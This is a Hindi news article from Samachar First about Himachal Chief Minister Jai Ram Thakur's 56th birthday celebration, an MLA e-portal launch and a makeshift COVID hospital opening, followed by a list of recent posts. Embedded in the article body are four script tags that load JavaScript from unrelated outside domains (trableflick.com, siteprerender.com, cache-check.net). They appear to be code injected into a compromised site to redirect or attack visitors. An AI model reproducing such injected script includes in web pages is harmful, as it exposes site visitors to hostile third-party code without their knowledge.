CM जयराम ठाकुर के 56वें जन्मदिन पर ओकओवर में कटा 56 किलो का केक

<p>मुख्यमंत्री जयराम ठाकुर का 56 वां जन्मदिन आज सरकारी आवास ओकओवर में धूमधाम से मनाया गया। इस मौके पर 56 किलो का केक काटा गया। ओक ओवर में सुबह से ही जन्मदिन की बधाई देने वालों का तांता लगा रहा जिसमे बीजेपी के कार्यकर्ताओं समेत बड़ी संख्या में प्रदेश के विभिन्न हिस्सों से आए लोग मौजूद रहे। इस मौके पर शहरी विकास मंत्री सुरेश भारद्वाज, वन मंत्री राकेश पठानिया ने भी मुख्यमंत्री को जन्मदिन की बधाई दी।</p>

<p>मुख्यमंत्री जयराम ठाकुर ने प्रदेश वासियों को उनके जन्मदिन पर बधाई देने के लिये धन्यवाद किया और तीन वर्ष के सहयोग के लिए धन्यवाद किया। प्रदेश निरन्तर प्रगति की राह पर आगे बढ़ता रहे और विकास के नए आयाम स्थापित हो। इस दौरान विधायक ई-पोर्टल का भी शुभारम्भ किया गया। मुख्यमंत्री ने कहा कि इसके माध्यम से विधायको का जनता से सीधा संपर्क किया जा सकेगा। तकनीक के माध्यम से जनता की समस्याओं को सुलझाया जा सकेगा और जनता सीधे अपने चुने प्रतिनिधि तक बात पहुंचा सकेगी। इसके बाद मुख्यमंत्री जयराम ठाकुर ने आईजीएमसी में मेकशिफ्ट हॉस्पिटल का लोकार्पण किया। उन्होंने कहा कि कोविड से निपटने के लिए प्रदेश में चार मेकशिफ्ट हॉस्पिटल बनाए गए हैं। कोविड की वैक्सीन आ गई है और जल्द ही लोगों तक इसे पहुंचाया जाएगा। उम्मीद की जा रही है कि जल्दी ही इस महामारी से निजात मिल जाएगी।</p>

<p><img src=”/media/gallery/images/image(1946).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1609917699393″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

2 hours ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

3 hours ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

4 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

4 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

4 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

5 hours ago